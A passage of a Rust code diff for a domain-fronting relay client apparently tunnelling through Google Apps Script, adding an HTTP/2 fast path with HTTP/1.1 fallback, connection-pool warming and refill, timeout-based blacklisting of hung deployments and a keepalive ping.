             if *guard != today_now {
@@ -341,7 +768,10 @@ impl DomainFronter {
             today_calls: self.today_calls.load(Ordering::Relaxed),
             today_bytes: self.today_bytes.load(Ordering::Relaxed),
             today_key,
-            today_reset_secs: seconds_until_utc_midnight(),
+            today_reset_secs: seconds_until_pacific_midnight(),
+            h2_calls: self.h2_calls.load(Ordering::Relaxed),
+            h2_fallbacks: self.h2_fallbacks.load(Ordering::Relaxed),
+            h2_disabled: self.h2_disabled.load(Ordering::Relaxed),
         }
     }
 
@@ -414,17 +844,67 @@ impl DomainFronter {
     }
 
     fn blacklist_script(&self, script_id: &str, reason: &str) {
-        let until = Instant::now() + Duration::from_secs(BLACKLIST_COOLDOWN_SECS);
+        self.blacklist_script_for(
+            script_id,
+            Duration::from_secs(BLACKLIST_COOLDOWN_SECS),
+            reason,
+        );
+    }
+
+    fn blacklist_script_for(&self, script_id: &str, cooldown: Duration, reason: &str) {
+        let until = Instant::now() + cooldown;
         let mut bl = self.blacklist.lock().unwrap();
         bl.insert(script_id.to_string(), until);
         tracing::warn!(
             "blacklisted script {} for {}s: {}",
             mask_script_id(script_id),
-            BLACKLIST_COOLDOWN_SECS,
+            cooldown.as_secs(),
             reason
         );
     }
 
+    /// Record a batch timeout against `script_id`. After
+    /// `auto_blacklist_strikes` timeouts inside `auto_blacklist_window`
+    /// the deployment is blacklisted for `auto_blacklist_cooldown` so the
+    /// round-robin stops sending real traffic to a deployment that's
+    /// hung (most commonly: stale `TUNNEL_SERVER_URL` after the
+    /// tunnel-node moved hosts).
+    pub(crate) fn record_timeout_strike(&self, script_id: &str) {
+        let now = Instant::now();
+        let mut counts = self.script_timeouts.lock().unwrap();
+        let entry = counts
+            .entry(script_id.to_string())
+            .or_insert((now, 0));
+        if now.duration_since(entry.0) > self.auto_blacklist_window {
+            *entry = (now, 1);
+        } else {
+            entry.1 += 1;
+        }
+        let strikes = entry.1;
+        if strikes >= self.auto_blacklist_strikes {
+            counts.remove(script_id);
+            drop(counts);
+            self.blacklist_script_for(
+                script_id,
+                self.auto_blacklist_cooldown,
+                &format!(
+                    "{} timeouts in {}s",
+                    strikes,
+                    self.auto_blacklist_window.as_secs()
+                ),
+            );
+        }
+    }
+
+    /// Clear the timeout strike counter for `script_id`. Called after
+    /// a batch succeeds so a recovered deployment doesn't keep stale
+    /// strikes — `auto_blacklist_strikes` timeouts must occur within one
+    /// real failure burst, not accumulate across unrelated incidents.
+    pub(crate) fn record_batch_success(&self, script_id: &str) {
+        let mut counts = self.script_timeouts.lock().unwrap();
+        counts.remove(script_id);
+    }
+
     /// Log a relay failure with extra guidance on cert-validation cases.
     /// Rate-limited so a flood of identical "UnknownIssuer" errors doesn't
     /// fill the log.
@@ -469,58 +949,220 @@ impl DomainFronter {
     }
 
     async fn open(&self) -> Result<PooledStream, FronterError> {
-        let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
-        let _ = tcp.set_nodelay(true);
-        let sni = self.next_sni();
-        let name = ServerName::try_from(sni)?;
-        let tls = self.tls_connector.connect(name, tcp).await?;
-        Ok(tls)
+        // Bounded TCP+TLS open. See `H1_OPEN_TIMEOUT_SECS`.
+        let work = async {
+            let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
+            let _ = tcp.set_nodelay(true);
+            let sni = self.next_sni();
+            let name = ServerName::try_from(sni)?;
+            // Always use the h1-only connector here — the pool only holds
+            // sockets that the raw HTTP/1.1 fallback path can write to.
+            // Using the shared connector would let some pooled sockets
+            // negotiate h2, which would then misframe every fallback
+            // request that lands on them.
+            let tls = self.tls_connector_h1.connect(name, tcp).await?;
+            Ok::<_, FronterError>(tls)
+        };
+        match tokio::time::timeout(Duration::from_secs(H1_OPEN_TIMEOUT_SECS), work).await {
+            Ok(r) => r,
+            Err(_) => Err(FronterError::Relay(format!(
+                "h1 open timed out after {}s",
+                H1_OPEN_TIMEOUT_SECS
+            ))),
+        }
     }
 
-    /// Open `n` outbound TLS connections in parallel and park them in the
-    /// pool so the first few user requests don't pay the handshake cost.
-    /// Errors are logged but not returned — best-effort.
+    /// Open outbound TLS connections eagerly so the first relay request
+    /// doesn't pay a cold handshake.
+    ///
+    /// h2 and h1 prewarm run in parallel: a request that arrives while
+    /// the h2 handshake is still in flight (or has just hit its 8 s
+    /// timeout) needs a warm h1 socket waiting for it, otherwise the
+    /// h1 fallback path pays a cold handshake on the same slow network
+    /// and the 30 s outer batch budget elapses (#924). v1.9.14 warmed
+    /// h1 unconditionally; v1.9.15 (PR #799) accidentally gated the h1
+    /// prewarm behind `ensure_h2()` so the h1 pool stayed empty during
+    /// the h2 init window.
+    ///
+    /// The spawned h2 handshake races h1[0] — boot fires two TLS
+    /// handshakes back-to-back. A 500 ms pause precedes every later
+    /// h1 open (h1[1..n]), so the remaining handshakes don't hit the
+    /// Google edge simultaneously. Entry `i` is back-dated by `8 * i`
+    /// seconds so the sockets roll off gradually instead of all hitting
+    /// POOL_TTL_SECS at once. `run_pool_refill` does not trim the pool
+    /// when h2 is the active fast path: it evicts entries older than
+    /// POOL_TTL_SECS and tops the pool back up to `POOL_MIN`, so any
+    /// warm h1 sockets beyond that just age out naturally.
     pub async fn warm(self: &Arc<Self>, n: usize) {
-        let mut set = tokio::task::JoinSet::new();
-        for _ in 0..n {
-            let me = self.clone();
-            set.spawn(async move {
-                match me.open().await {
-                    Ok(s) => Some(PoolEntry {
+        // Spawn the h2 prewarm in parallel so the h1 prewarm loop
+        // below isn't blocked on it. Capturing the join handle lets
+        // us still log "h2 fast path active" / "h1 fallback only"
+        // accurately at the end.
+        let h2_self = self.clone();
+        let h2_handle = tokio::spawn(async move {
+            !h2_self.h2_disabled.load(Ordering::Relaxed)
+                && h2_self.ensure_h2().await.is_some()
+        });
+
+        let mut warmed = 0usize;
+        for i in 0..n {
+            if i > 0 {
+                tokio::time::sleep(Duration::from_millis(500)).await;
+            }
+            match self.open().await {
+                Ok(s) => {
+                    let entry = PoolEntry {
                         stream: s,
-                        created: Instant::now(),
-                    }),
-                    Err(e) => {
-                        tracing::debug!("pool warm: open failed: {}", e);
-                        None
+                        created: Instant::now() - Duration::from_secs(8 * i as u64),
+                    };
+                    let mut pool = self.pool.lock().await;
+                    if pool.len() < POOL_MAX {
+                        pool.push(entry);
+                        warmed += 1;
                     }
                 }
-            });
+                Err(e) => {
+                    tracing::debug!("pool warm: open failed: {}", e);
+                }
+            }
+        }
+        // Join the h2 prewarm here only to log whether it landed; the
+        // h1 pool above is already populated either way. A panic in
+        // the spawned task surfaces as `JoinError` — log it explicitly
+        // so it isn't indistinguishable from a clean ALPN refusal.
+        let h2_alive = match h2_handle.await {
+            Ok(v) => v,
+            Err(e) => {
+                tracing::warn!("h2 prewarm task failed to join: {}", e);
+                false
+            }
+        };
+        if h2_alive {
+            tracing::info!(
+                "h2 fast path active; h1 fallback pool pre-warmed with {} connection(s)",
+                warmed
+            );
+        } else if warmed > 0 {
+            tracing::info!("pool pre-warmed with {} connection(s)", warmed);
         }
-        let mut warmed = 0;
-        while let Some(res) = set.join_next().await {
-            if let Ok(Some(entry)) = res {
+    }
+
+    /// Background loop that keeps the h1 pool warm.
+    ///
+    /// Always maintains `POOL_MIN` (8) connections. Full-tunnel mode
+    /// uses the h1 pool for all batch traffic (h2 is skipped for
+    /// tunnel batches), so the pool must stay at full capacity
+    /// regardless of h2 status. Relay mode also benefits from a warm
+    /// pool as h1 fallback.
+    ///
+    /// A connection only counts toward the minimum if it has at least
+    /// 20 s of TTL remaining — nearly-expired entries don't help.
+    /// Checks every `POOL_REFILL_INTERVAL_SECS`, evicts expired entries,
+    /// and opens replacements one at a time so there's no burst.
+    pub async fn run_pool_refill(self: Arc<Self>) {
+        const MIN_REMAINING_SECS: u64 = 20;
+        loop {
+            tokio::time::sleep(Duration::from_secs(POOL_REFILL_INTERVAL_SECS)).await;
+
+            // Evict expired entries first.
+            {
                 let mut pool = self.pool.lock().await;
-                if pool.len() < POOL_MAX {
-                    pool.push(entry);
-                    warmed += 1;
+                pool.retain(|e| e.created.elapsed().as_secs() < POOL_TTL_SECS);
+            }
+
+            let target = POOL_MIN;
+
+            // Count only connections with enough life left.
+            // Refill one at a time to avoid bursting TLS handshakes.
+            loop {
+                let healthy = {
+                    let pool = self.pool.lock().await;
+                    pool.iter()
+                        .filter(|e| {
+                            let age = e.created.elapsed().as_secs();
+                            age + MIN_REMAINING_SECS < POOL_TTL_SECS
+                        })
+                        .count()
+                };
+                if healthy >= target {
+                    break;
+                }
+                match self.open().await {
+                    Ok(s) => {
+                        let mut pool = self.pool.lock().await;
+                        if pool.len() < POOL_MAX {
+                            pool.push(PoolEntry {
+                                stream: s,
+                                created: Instant::now(),
+                            });
+                        }
+                    }
+                    Err(e) => {
+                        tracing::debug!("pool refill: open failed: {}", e);
+                        break;
+                    }
                 }
             }
         }
-        if warmed > 0 {
-            tracing::info!("pool pre-warmed with {} connection(s)", warmed);
+    }
+
+    /// Keep the Apps Script container warm with a periodic HEAD ping.
+    ///
+    /// The TCP/TLS pool stays warm via `run_pool_refill`, but the V8
+    /// container Apps Script runs in goes cold ~5min after the last
+    /// `UrlFetchApp` call and costs 1-3s to spin back up. The symptom
+    /// is "first request after a quiet period stalls" — most visible
+    /// on YouTube where the player gives up on a 1.5s `googlevideo.com`
+    /// chunk that's actually waiting on a cold-start.
+    ///
+    /// Transport-agnostic: the underlying call goes through the same
+    /// `relay_uncoalesced` path everything else uses, so when h2 is
+    /// up the keepalive rides the multiplexed connection too.
+    ///
+    /// Bypasses the response cache (`cache_key_opt = None`) and the
+    /// inflight coalescer — otherwise the second iteration would just
+    /// hit the cached response from the first and never reach Apps
+    /// Script. The relay payload itself is the cheapest non-error one
+    /// we can build: a HEAD against `http://example.com/` returns a few
+    /// hundred bytes, no body decode, no auth.
+    ///
+    /// Best-effort. Failures are debug-logged so a flaky network or
+    /// quota-exhausted account doesn't spam warnings every 4 minutes.
+    /// Loops forever — caller is expected to drop the JoinHandle on
+    /// shutdown (the task lives as long as the process).
+    pub async fn run_keepalive(self: Arc<Self>) {
+        loop {
+            tokio::time::sleep(Duration::from_secs(H1_KEEPALIVE_INTERVAL_SECS)).await;
+            let t0 = Instant::now();
+            // relay_uncoalesced returns Vec<u8> (always — errors are
+            // baked into 5xx responses), so just observe the duration
+            // for the debug line. We intentionally don't use relay()
+            // here because that path goes through the cache + coalesce
+            // layer, which would short-circuit subsequent pings.
+            let _ = self
+                .relay_uncoalesced("HEAD", "http://example.com/", &[], &[], None)
+                .await;
+            tracing::debug!(
+                "container keepalive: {}ms",
+                t0.elapsed().as_millis()
+            );
         }
     }
 
     async fn acquire(&self) -> Result<PoolEntry, FronterError> {
         {
             let mut pool = self.pool.lock().await;
-            while let Some(entry) = pool.pop() {
-                if entry.created.elapsed().as_secs() < POOL_TTL_SECS {
-                    return Ok(entry);
-                }
-                // expired — drop it
-                drop(entry);
+            // Evict expired, then hand out the freshest (most remaining TTL).
+            pool.retain(|e| e.created.elapsed().as_secs() < POOL_TTL_SECS);
+            if !pool.is_empty() {
+                // Freshest = smallest elapsed time. swap_remove is O(1).
+                let freshest = pool
+                    .iter()
+                    .enumerate()
+                    .min_by_key(|(_, e)| e.created.elapsed())
+                    .map(|(i, _)| i)
+                    .unwrap();
+                return Ok(pool.swap_remove(freshest));
             }
         }
         let stream = self.open().await?;
@@ -540,6 +1182,556 @@ impl DomainFronter {
         }
     }
 
+    /// Return a cloned `SendRequest` handle (paired with its cell
+    /// generation) to the active HTTP/2 connection, opening a new one
+    /// if needed. `None` means the h2 fast path is unavailable for
+    /// this call — the caller should fall through to the h1 path.
+    ///
+    /// Reasons we may return `None`:
+    ///   - `force_http1` set, or peer previously refused h2 via ALPN
+    ///     (sticky `h2_disabled`).
+    ///   - We're inside the `H2_OPEN_FAILURE_BACKOFF_SECS` cooldown
+    ///     after a recent open failure.
+    ///   - Another task is currently opening a connection and we
+    ///     don't want to pile on (`try_lock` on `h2_open_lock`).
+    ///   - The open we just attempted timed out within
+    ///     `H2_OPEN_TIMEOUT_SECS` or otherwise failed.
+    ///
+    /// The lock on `h2_cell` is *never* held across network I/O —
+    /// that's the whole point of `h2_open_lock`. Concurrent first-time
+    /// callers compete for `h2_open_lock` via `try_lock`; the loser
+    /// returns None immediately and uses h1 rather than serializing
+    /// behind a slow handshake.
+    ///
+    /// The returned generation lets the caller later
+    /// `poison_h2_if_gen(gen)` to clear *only* this specific cell on
+    /// per-stream error, avoiding the race where a stale failure
+    /// clobbers a freshly-reopened healthy cell.
+    async fn ensure_h2(&self) -> Option<(h2::client::SendRequest<Bytes>, u64)> {
+        if self.h2_disabled.load(Ordering::Relaxed) {
+            return None;
+        }
+
+        // Fast path: existing cell, within TTL and not flagged dead by
+        // the connection driver. We can't peek at SendRequest liveness
+        // synchronously (h2 0.4 doesn't expose `is_closed`), but the
+        // driver task does flip `dead` when the underlying connection
+        // ends — so a known-dead cell is rejected here without paying
+        // a wasted h2 round trip to discover it.
+        {
+            let cell = self.h2_cell.lock().await;
+            if let Some(c) = cell.as_ref() {
+                if c.created.elapsed().as_secs() < H2_CONN_TTL_SECS
+                    && !c.dead.load(Ordering::Relaxed)
+                {
+                    return Some((c.send.clone(), c.generation));
+                }
+            }
+        }
+
+        // Backoff check — recent open failure means h2 is currently
+        // unhealthy; don't pile on retries until the window expires.
+        {
+            let last = self.h2_open_failed_at.lock().await;
+            if let Some(t) = *last {
+                if t.elapsed().as_secs() < H2_OPEN_FAILURE_BACKOFF_SECS {
+                    return None;
+                }
+            }
+        }
+
+        // Open dedup: only one task does the actual handshake at a
+        // time. Concurrent callers see the lock contended and fall
+        // through to h1 immediately — preserves cold-start latency
+        // for the burst that arrives during a slow open.
+        let _open_guard = match self.h2_open_lock.try_lock() {
+            Ok(g) => g,
+            Err(_) => return None,
+        };
+
+        // Re-check the cell under open_lock — another task may have
+        // just stored a fresh connection while we were arbitrating.
+        {
+            let cell = self.h2_cell.lock().await;
+            if let Some(c) = cell.as_ref() {
+                if c.created.elapsed().as_secs() < H2_CONN_TTL_SECS
+                    && !c.dead.load(Ordering::Relaxed)
+                {
+                    return Some((c.send.clone(), c.generation));
+                }
+            }
+        }
+
+        // Bounded handshake. A blackholed connect target can stall
+        // for many seconds otherwise, eating the outer budget that
+        // should be reserved for an h1 fallback round-trip.
+        let open_result =
+            tokio::time::timeout(Duration::from_secs(H2_OPEN_TIMEOUT_SECS), self.open_h2())
+                .await;
+
+        let (send, dead) = match open_result {
+            Ok(Ok(pair)) => pair,
+            Ok(Err(OpenH2Error::AlpnRefused)) => {
+                // Definitive: this peer doesn't speak h2. Sticky-disable
+                // so we never re-attempt the handshake.
+                self.h2_disabled.store(true, Ordering::Relaxed);
+                tracing::info!(
+                    "relay peer refused h2 via ALPN; staying on http/1.1"
+                );
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+            Ok(Err(e)) => {
+                tracing::debug!("h2 open failed: {} — falling back to h1", e);
+                *self.h2_open_failed_at.lock().await = Some(Instant::now());
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+            Err(_) => {
+                tracing::debug!(
+                    "h2 open timed out after {}s — falling back to h1",
+                    H2_OPEN_TIMEOUT_SECS
+                );
+                *self.h2_open_failed_at.lock().await = Some(Instant::now());
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+        };
+
+        // Open succeeded. Tag with a fresh generation, store, return.
+        // Clear any stale backoff timestamp.
+        let generation = self.h2_generation.fetch_add(1, Ordering::Relaxed) + 1;
+        *self.h2_open_failed_at.lock().await = None;
+        let mut cell = self.h2_cell.lock().await;
+        *cell = Some(H2Cell {
+            send: send.clone(),
+            created: Instant::now(),
+            generation,
+            dead,
+        });
+        Some((send, generation))
+    }
+
+    /// Open one TLS connection and run the h2 handshake. Returns a
+    /// typed `OpenH2Error` so the caller can recognize ALPN refusal
+    /// (sticky disable) without string-matching across boundaries.
+    /// The returned `Arc<AtomicBool>` is the death flag the connection
+    /// driver flips when the h2 `Connection` future ends.
+    async fn open_h2(
+        &self,
+    ) -> Result<(h2::client::SendRequest<Bytes>, Arc<AtomicBool>), OpenH2Error> {
+        let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
+        let _ = tcp.set_nodelay(true);
+        let sni = self.next_sni();
+        let name = ServerName::try_from(sni)?;
+        let tls = self.tls_connector.connect(name, tcp).await?;
+        Self::h2_handshake_post_tls(tls).await
+    }
+
+    /// Post-TLS portion of the h2 open path: ALPN check + h2 handshake
+    /// + connection-driver task spawn. Split out from `open_h2` so
+    /// tests can drive it with a TLS stream from any local server,
+    /// bypassing the hard-coded `connect_host:443` target.
+    async fn h2_handshake_post_tls(
+        tls: PooledStream,
+    ) -> Result<(h2::client::SendRequest<Bytes>, Arc<AtomicBool>), OpenH2Error> {
+        let alpn_h2 = tls
+            .get_ref()
+            .1
+            .alpn_protocol()
+            .map(|p| p == b"h2")
+            .unwrap_or(false);
+        if !alpn_h2 {
+            return Err(OpenH2Error::AlpnRefused);
+        }
+        // Larger initial windows mean we don't have to call
+        // `release_capacity` on every chunk for typical Apps Script
+        // payloads (usually < 1 MB; range chunks are 256 KB). We still
+        // release capacity in the body-read loop for safety on larger
+        // bodies.
+        let (send, conn) = h2::client::Builder::new()
+            .initial_window_size(4 * 1024 * 1024)
+            .initial_connection_window_size(8 * 1024 * 1024)
+            .handshake(tls)
+            .await
+            .map_err(|e| OpenH2Error::Handshake(e.to_string()))?;
+        // The connection task drives frame I/O independently of any
+        // SendRequest handle. When it ends (GOAWAY, network error, TTL),
+        // we flip the `dead` flag so the next `ensure_h2` call rejects
+        // the cached cell and reopens, instead of waiting for a
+        // request to discover the breakage via `ready()` failure.
+        let dead = Arc::new(AtomicBool::new(false));
+        let dead_for_driver = dead.clone();
+        tokio::spawn(async move {
+            if let Err(e) = conn.await {
+                tracing::debug!("h2 connection closed: {}", e);
+            }
+            dead_for_driver.store(true, Ordering::Relaxed);
+        });
+        tracing::info!("h2 connection established to relay edge");
+        Ok((send, dead))
+    }
+
+    /// Handle an HTTP response whose status marks h2 as incompatible
+    /// with this fronting setup (see `is_h2_fronting_refusal_status`).
+    /// Three effects, in order:
+    ///   * set the sticky `h2_disabled` flag, so later calls skip h2
+    ///     and go straight to h1 instead of repeating the refusal,
+    ///   * empty the h2 cell, dropping the stored SendRequest,
+    ///   * move this request from `h2_calls` to `h2_fallbacks`: the
+    ///     Ok path of `run_h2_relay_with_send` has already counted the
+    ///     round-trip as a successful h2 call, but the request is
+    ///     going to be served over h1.
+    /// The info-level log fires only on the first transition into the
+    /// disabled state; `status` and `context` appear only in that log
+    /// line.
+    async fn sticky_disable_h2_for_fronting_refusal(&self, status: u16, context: &str) {
+        let already_disabled = self.h2_disabled.swap(true, Ordering::Relaxed);
+        if !already_disabled {
+            tracing::info!(
+                "h2 returned HTTP {} for {} — likely :authority/SNI mismatch via \
+                 domain fronting. Disabling h2 fast path for this fronter and \
+                 falling back to http/1.1.",
+                status,
+                context,
+            );
+        }
+        // Drop whatever connection handle the cell currently holds.
+        *self.h2_cell.lock().await = None;
+        // Reclassify this attempt: take back the `h2_calls` increment
+        // made by run_h2_relay_with_send and record a fallback instead.
+        // The decrement is skipped when the counter is already zero, so
+        // calling this helper from a path that never incremented it
+        // cannot underflow the counter.
+        let _ = self.h2_calls.fetch_update(Ordering::Relaxed, Ordering::Relaxed, |calls| {
+            (calls > 0).then(|| calls - 1)
+        });
+        self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+    }
+
+    /// Empty the h2 cell, but only when it still holds the connection
+    /// generation the caller was using. The race this avoids:
+    ///   1. Task A is using a SendRequest from generation N.
+    ///   2. That connection dies and Task B reopens, so the cell now
+    ///      holds a healthy generation N+1.
+    ///   3. Task A's stale stream fails; an unconditional clear would
+    ///      throw away the healthy N+1 connection.
+    /// A mismatched generation, or an already-empty cell, is a no-op.
+    async fn poison_h2_if_gen(&self, generation: u64) {
+        let mut guard = self.h2_cell.lock().await;
+        // The check and the clear both happen under this one guard.
+        let is_current = matches!(guard.as_ref(), Some(held) if held.generation == generation);
+        if is_current {
+            *guard = None;
+        }
+    }
+
+    /// Run exactly one request/response exchange on a single h2 stream
+    /// and return `(status, headers, body)` — the same shape the h1
+    /// path's `read_http_response` produces, so callers can stay
+    /// transport-agnostic. Redirects are not followed here; the caller
+    /// (`run_h2_relay_with_send`) issues one call per hop.
+    ///
+    /// The request URI is `https://{host}{path}`, so `path` must carry
+    /// its leading slash; `method` is used as given. An empty `payload`
+    /// ends the stream with the request headers, otherwise it is sent
+    /// as the body. `content_type` is set as a header only when `Some`.
+    /// A gzip-encoded response body is decoded before returning (left
+    /// as-is if decoding fails). Errors carry a `RequestSent` flag so
+    /// the caller can distinguish "never sent" (safe to retry on h1)
+    /// from "may have been processed by origin" (only safe to retry
+    /// for idempotent methods).
+    ///
+    /// Two phases, two timeouts:
+    ///   * **Ready (back-pressure):** bounded by `H2_READY_TIMEOUT_SECS`
+    ///     (5 s constant). A stall here means the conn is saturated
+    ///     under `MAX_CONCURRENT_STREAMS` (or dead at the muxer level)
+    ///     but no stream has opened — `RequestSent::No`.
+    ///   * **Response (post-send):** bounded by the caller-provided
+    ///     `response_deadline`. After `send_request` returns Ok the
+    ///     headers are queued; we conservatively treat any later
+    ///     failure or timeout as `RequestSent::Maybe`. Caller picks
+    ///     the deadline so legitimate slow Apps Script calls and
+    ///     Full-mode batches with custom `request_timeout_secs` aren't
+    ///     cut off at an arbitrary fixed cap.
+    async fn h2_round_trip(
+        &self,
+        send: h2::client::SendRequest<Bytes>,
+        method: &str,
+        path: &str,
+        host: &str,
+        payload: Bytes,
+        content_type: Option<&str>,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        // h2 requires absolute-form URIs with the :authority pseudo-header
+        // populated from the Host. http::Request's URI parser accepts
+        // `https://{host}{path}` for that.
+        let uri = format!("https://{}{}", host, path);
+        let mut builder = http::Request::builder().method(method).uri(uri);
+        // Apps Script accepts gzip on the response; mirror the h1 path so
+        // payloads stay small.
+        builder = builder.header("accept-encoding", "gzip");
+        if let Some(ct) = content_type {
+            builder = builder.header("content-type", ct);
+        }
+        let req = builder.body(()).map_err(|e| {
+            (
+                FronterError::Relay(format!("h2 request build: {}", e)),
+                RequestSent::No,
+            )
+        })?;
+
+        // Phase 1: ready/back-pressure. Bounded short. Timeout here
+        // means saturation, not server-side processing — the stream
+        // hasn't even opened, so `RequestSent::No`.
+        let ready_result = tokio::time::timeout(
+            Duration::from_secs(H2_READY_TIMEOUT_SECS),
+            send.ready(),
+        )
+        .await;
+        let mut send = match ready_result {
+            Ok(Ok(s)) => s,
+            Ok(Err(e)) => {
+                return Err((
+                    FronterError::Relay(format!("h2 ready: {}", e)),
+                    RequestSent::No,
+                ));
+            }
+            Err(_) => {
+                return Err((FronterError::Timeout, RequestSent::No));
+            }
+        };
+
+        let has_body = !payload.is_empty();
+        // send_request is synchronous; it queues the HEADERS frame.
+        // After this returns Ok we conservatively assume the request
+        // reached the server. An Err here means the stream couldn't
+        // be opened (e.g. connection-level GOAWAY), safe to retry.
+        let (response_fut, mut body_tx) = send.send_request(req, !has_body).map_err(|e| {
+            (
+                FronterError::Relay(format!("h2 send_request: {}", e)),
+                RequestSent::No,
+            )
+        })?;
+
+        if has_body {
+            // body_tx errors here are RequestSent::Maybe — headers were
+            // already queued, so we may have invoked Apps Script's doPost
+            // even if the body never finished.
+            body_tx.send_data(payload, true).map_err(|e| {
+                (
+                    FronterError::Relay(format!("h2 send_data: {}", e)),
+                    RequestSent::Maybe,
+                )
+            })?;
+        }
+
+        // Phase 2: response headers + body drain. Bounded by the
+        // caller's deadline. Errors and timeout here are
+        // `RequestSent::Maybe` — the request is on the wire and may
+        // already have side effects.
+        let response_phase = async {
+            let response = response_fut.await.map_err(|e| {
+                (
+                    FronterError::Relay(format!("h2 response: {}", e)),
+                    RequestSent::Maybe,
+                )
+            })?;
+            let (parts, mut body) = response.into_parts();
+            let status = parts.status.as_u16();
+
+            // Convert headers to the (String, String) Vec the rest of
+            // the codebase expects: one entry per value for multi-valued
+            // headers (set-cookie, etc.), matching httparse's emission.
+            // Values for which `to_str` fails are skipped.
+            let mut headers: Vec<(String, String)> = Vec::with_capacity(parts.headers.len());
+            for (name, value) in parts.headers.iter() {
+                if let Ok(v) = value.to_str() {
+                    headers.push((name.as_str().to_string(), v.to_string()));
+                }
+            }
+
+            // Drain body. Release flow-control credit per chunk so
+            // large responses don't stall after the initial 4 MB window.
+            let mut buf: Vec<u8> = Vec::new();
+            while let Some(chunk) = body.data().await {
+                let chunk = chunk.map_err(|e| {
+                    (
+                        FronterError::Relay(format!("h2 body chunk: {}", e)),
+                        RequestSent::Maybe,
+                    )
+                })?;
+                let n = chunk.len();
+                buf.extend_from_slice(&chunk);
+                let _ = body.flow_control().release_capacity(n);
+            }
+            Ok::<_, (FronterError, RequestSent)>((status, headers, buf))
+        };
+
+        let (status, headers, mut buf) = match tokio::time::timeout(
+            response_deadline,
+            response_phase,
+        )
+        .await
+        {
+            Ok(Ok(t)) => t,
+            Ok(Err(e)) => return Err(e),
+            Err(_) => return Err((FronterError::Timeout, RequestSent::Maybe)),
+        };
+
+        // Mirror `read_http_response`: if the server gzipped the body
+        // (we asked for it via accept-encoding), decompress before
+        // handing back so downstream JSON / envelope parsers see plain
+        // bytes regardless of transport.
+        if let Some(enc) = header_get(&headers, "content-encoding") {
+            if enc.eq_ignore_ascii_case("gzip") {
+                if let Ok(decoded) = decode_gzip(&buf) {
+                    buf = decoded;
+                }
+            }
+        }
+
+        Ok((status, headers, buf))
+    }
+
+    /// Relay one request over h2: take the shared connection from
+    /// `ensure_h2`, then run the initial POST plus up to 5 redirect
+    /// hops. `path` is the Apps Script `/macros/s/{id}/exec` path.
+    /// Success yields the same `(status, headers, body)` as the h1 path.
+    ///
+    /// `response_deadline` bounds the post-send phase of each round
+    /// trip (response headers + body drain); the ready/back-pressure
+    /// phase has its own short bound (`H2_READY_TIMEOUT_SECS`). The
+    /// caller chooses the deadline from its own outer budget:
+    ///   * Apps-Script direct (`relay_uncoalesced`): a few seconds
+    ///     under `REQUEST_TIMEOUT_SECS` (25 s), leaving room for an
+    ///     h1 fallback after an h2 timeout.
+    ///   * Full-mode tunnel (`tunnel_request` / `tunnel_batch_request_to`):
+    ///     `self.batch_timeout`, so the user's `request_timeout_secs`
+    ///     setting actually applies.
+    ///
+    /// On error, the second tuple field is `RequestSent::No` when the
+    /// request never reached Apps Script (safe to retry on h1) and
+    /// `RequestSent::Maybe` when it may have been processed (a replay
+    /// risks duplicated side effects for non-idempotent methods). When
+    /// `ensure_h2` yields no connection the error is always `No`.
+    ///
+    /// `payload` is `Bytes` so a caller that keeps a copy for the h1
+    /// fallback pays for an Arc bump rather than a memcpy.
+    async fn h2_relay_request(
+        &self,
+        path: &str,
+        payload: Bytes,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        let Some((send, generation)) = self.ensure_h2().await else {
+            // `ensure_h2` yields None in two situations:
+            //   1. force_http1 / sticky-disabled — h2 was never
+            //      attempted on this call, so it is NOT a fallback
+            //      and is left uncounted.
+            //   2. open_h2 just failed / timed out / backoff is
+            //      active — h2 was attempted and lost, so the call
+            //      is counted as a fallback. (`ensure_h2` itself
+            //      sets the backoff timestamp on failure.)
+            // Only `h2_disabled` is consulted to tell the two apart.
+            // Either way nothing was sent, hence `RequestSent::No`.
+            let sticky_disabled = self.h2_disabled.load(Ordering::Relaxed);
+            if !sticky_disabled {
+                self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+            }
+            let unavailable = FronterError::Relay("h2 unavailable".into());
+            return Err((unavailable, RequestSent::No));
+        };
+
+        // The POST and any redirect hops run in the shared inner loop.
+        self.run_h2_relay_with_send(send, generation, path, payload, response_deadline)
+            .await
+    }
+
+    /// Body of the h2 relay: one POST, then up to 5 redirect hops as
+    /// GETs on the same connection. Kept separate from
+    /// `h2_relay_request` so tests can inject a `SendRequest` (from a
+    /// local h2c test server) and skip `ensure_h2`'s real handshake.
+    ///
+    /// No timeout is applied at this level: every `h2_round_trip`
+    /// enforces its own ready (5 s constant) and response
+    /// (`response_deadline`) bounds, and a failure poisons the cell.
+    async fn run_h2_relay_with_send(
+        &self,
+        send: h2::client::SendRequest<Bytes>,
+        generation: u64,
+        path: &str,
+        payload: Bytes,
+        response_deadline: Duration,
+    ) -> Result<(u16, Vec<(String, String)>, Vec<u8>), (FronterError, RequestSent)> {
+        let mut host = self.http_host.to_string();
+        let mut target = path.to_string();
+
+        let first = self
+            .h2_round_trip(
+                send.clone(),
+                "POST",
+                &target,
+                &host,
+                payload,
+                Some("application/json"),
+                response_deadline,
+            )
+            .await;
+        let (mut status, mut hdrs, mut body) = match first {
+            Ok(triple) => triple,
+            Err((err, sent)) => {
+                // Failure on the initial POST: the round trip's own
+                // `RequestSent` verdict is passed through unchanged.
+                self.poison_h2_if_gen(generation).await;
+                self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+                return Err((err, sent));
+            }
+        };
+
+        // Once the initial POST has completed, Apps Script has seen
+        // the request. Any failure while following redirects is
+        // therefore reported as RequestSent::Maybe, whatever the
+        // failing hop itself says, because the original call may
+        // already have executed.
+        let mut hops_left = 5;
+        while hops_left > 0 && matches!(status, 301 | 302 | 303 | 307 | 308) {
+            hops_left -= 1;
+            let Some(loc) = header_get(&hdrs, "location") else {
+                break;
+            };
+            let (rpath, rhost) = parse_redirect(&loc);
+            if let Some(next_host) = rhost {
+                host = next_host;
+            }
+            target = rpath;
+            let hop = self
